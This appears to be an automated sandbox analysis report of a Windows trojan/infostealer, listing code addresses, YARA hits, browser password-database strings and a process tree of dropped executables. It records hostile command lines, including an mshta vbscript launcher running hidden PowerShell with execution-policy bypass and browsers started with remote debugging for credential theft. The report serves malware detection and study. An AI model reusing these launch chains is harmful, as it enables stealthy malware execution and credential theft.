Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65D9B0	0_2_6C65D9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C665190	0_2_6C665190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C682990	0_2_6C682990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C669A60	0_2_6C669A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C641AF0	0_2_6C641AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66E2F0	0_2_6C66E2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C668AC0	0_2_6C668AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6222A0	0_2_6C6222A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C654AA0	0_2_6C654AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C63CAB0	0_2_6C63CAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C692AB0	0_2_6C692AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69BA90	0_2_6C69BA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C63C370	0_2_6C63C370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C625340	0_2_6C625340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66D320	0_2_6C66D320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6953C8	0_2_6C6953C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62F380	0_2_6C62F380
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DAC60	0_2_6C6DAC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7AAC30	0_2_6C7AAC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C796C00	0_2_6C796C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C72ECD0	0_2_6C72ECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CECC0	0_2_6C6CECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79ED70	0_2_6C79ED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7FAD50	0_2_6C7FAD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C85CDC0	0_2_6C85CDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C858D20	0_2_6C858D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D4DB0	0_2_6C6D4DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C766D90	0_2_6C766D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C76EE70	0_2_6C76EE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B0E20	0_2_6C7B0E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DAEC0	0_2_6C6DAEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C770EC0	0_2_6C770EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C756E90	0_2_6C756E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C792F70	0_2_6C792F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C818FB0	0_2_6C818FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73EF40	0_2_6C73EF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D6F10	0_2_6C6D6F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7AEFF0	0_2_6C7AEFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D0FE0	0_2_6C6D0FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C810F20	0_2_6C810F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DEFB0	0_2_6C6DEFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7A4840	0_2_6C7A4840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C720820	0_2_6C720820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75A820	0_2_6C75A820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D68E0	0_2_6C7D68E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BC8C0	0_2_6C7BC8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C708960	0_2_6C708960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C726900	0_2_6C726900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7049F0	0_2_6C7049F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7EC9E0	0_2_6C7EC9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7909B0	0_2_6C7909B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7609A0	0_2_6C7609A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78A9A0	0_2_6C78A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74CA70	0_2_6C74CA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C788A30	0_2_6C788A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C77EA00	0_2_6C77EA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74EA80	0_2_6C74EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D6BE0	0_2_6C7D6BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D8BAC	0_2_6C6D8BAC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C770BA0	0_2_6C770BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E8460	0_2_6C6E8460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75A430	0_2_6C75A430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C734420	0_2_6C734420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7164D0	0_2_6C7164D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C76A4D0	0_2_6C76A4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7FA480	0_2_6C7FA480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C770570	0_2_6C770570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C732560	0_2_6C732560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C728540	0_2_6C728540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D4540	0_2_6C7D4540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75E5F0	0_2_6C75E5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79A5E0	0_2_6C79A5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C818550	0_2_6C818550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C45B0	0_2_6C6C45B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C72C650	0_2_6C72C650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C72E6E0	0_2_6C72E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C76E6E0	0_2_6C76E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F46D0	0_2_6C6F46D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C750700	0_2_6C750700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FA7D0	0_2_6C6FA7D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C71E070	0_2_6C71E070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C798010	0_2_6C798010
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79C000	0_2_6C79C000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7AC0B0	0_2_6C7AC0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E00B0	0_2_6C6E00B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C8090	0_2_6C6C8090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8261B0	0_2_6C8261B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C738140	0_2_6C738140
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C746130	0_2_6C746130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B4130	0_2_6C7B4130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D01E0	0_2_6C6D01E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C758260	0_2_6C758260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C768250	0_2_6C768250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8562C0	0_2_6C8562C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7A8220	0_2_6C7A8220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79A210	0_2_6C79A210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79E2B0	0_2_6C79E2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7A22A0	0_2_6C7A22A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C766370	0_2_6C766370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D2370	0_2_6C6D2370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7EC360	0_2_6C7EC360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D8340	0_2_6C6D8340
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Code function: 20_2_00725C83	20_2_00725C83
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Code function: 20_2_0072735A	20_2_0072735A
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Code function: 20_2_00768860	20_2_00768860
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Code function: 20_2_00724DE0	20_2_00724DE0
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Code function: 20_2_00724B30	20_2_00724B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_010231A8	21_2_010231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_01027049	21_2_01027049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_01028860	21_2_01028860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_010278BB	21_2_010278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00FE4B30	21_2_00FE4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_01022D10	21_2_01022D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00FE4DE0	21_2_00FE4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_01017F36	21_2_01017F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_0102779B	21_2_0102779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00FEE530	23_2_00FEE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_01006192	23_2_01006192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_01028860	23_2_01028860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00FE4B30	23_2_00FE4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_01022D10	23_2_01022D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00FE4DE0	23_2_00FE4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_01000E13	23_2_01000E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_010231A8	23_2_010231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_01027049	23_2_01027049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_0102779B	23_2_0102779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_01001602	23_2_01001602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_010278BB	23_2_010278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_01003DF1	23_2_01003DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_01017F36	23_2_01017F36

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C85DAE0 appears 49 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6F9B10 appears 49 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C85D930 appears 40 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6F3620 appears 52 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6694D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C65CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C8509D0 appears 215 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 01018E10 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00FFDF80 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00FFD64E appears 66 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00FFD942 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00FFD663 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00FF80C0 appears 263 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00FF7A00 appears 38 times
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Code function: String function: 007380C0 appears 130 times

Source: file.exe, 00000000.00000002.2445370306.000000006C6B2000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: amsi32_8712.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8712, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: file.exe	Static PE information: Section: xxdbzcjj ZLIB complexity 0.9948846726190477
Source: file1[1].exe.23.dr	Static PE information: Section: ZLIB complexity 0.9992582208188153
Source: file1[1].exe.23.dr	Static PE information: Section: ytlmplcn ZLIB complexity 0.994779892714201
Source: file1.exe.23.dr	Static PE information: Section: ZLIB complexity 0.9992582208188153
Source: file1.exe.23.dr	Static PE information: Section: ytlmplcn ZLIB complexity 0.994779892714201
Source: random[1].exe0.23.dr	Static PE information: Section: xxdbzcjj ZLIB complexity 0.9948846726190477
Source: 3160604f40.exe.23.dr	Static PE information: Section: xxdbzcjj ZLIB complexity 0.9948846726190477

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@95/332@65/32

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C687030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C687030

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\M4PJU0MA.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8744:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_03

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

File created: C:\Users\user\AppData\Local\Temp\c397cfa7-4e59-49ce-b9b9-c6e3f633cda4.tmp

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000003.2181905406.000000001D4A9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269966395.000000001D49D000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756308716.0000000005A96000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005A79000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2767812066.0000000005A9A000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768557455.0000000005A7D000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2877562568.0000000005624000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005605000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2890347826.000000000562E000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3054993967.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039810033.0000000005C19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe

ReversingLabs: Detection: 36%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2168,i,14858037877617579678,5688177104923091675,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2224,i,5174629620199250997,17853157087695469379,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7124 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7304 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsECAFHIIJJE.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsECAFHIIJJE.exe "C:\Users\user\DocumentsECAFHIIJJE.exe"
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe "C:\Users\user\AppData\Local\Temp\1005627001\file1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1005628041\k4pDgO.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2272 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7420 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe "C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe "C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe"
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 """""" ,0:close")
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
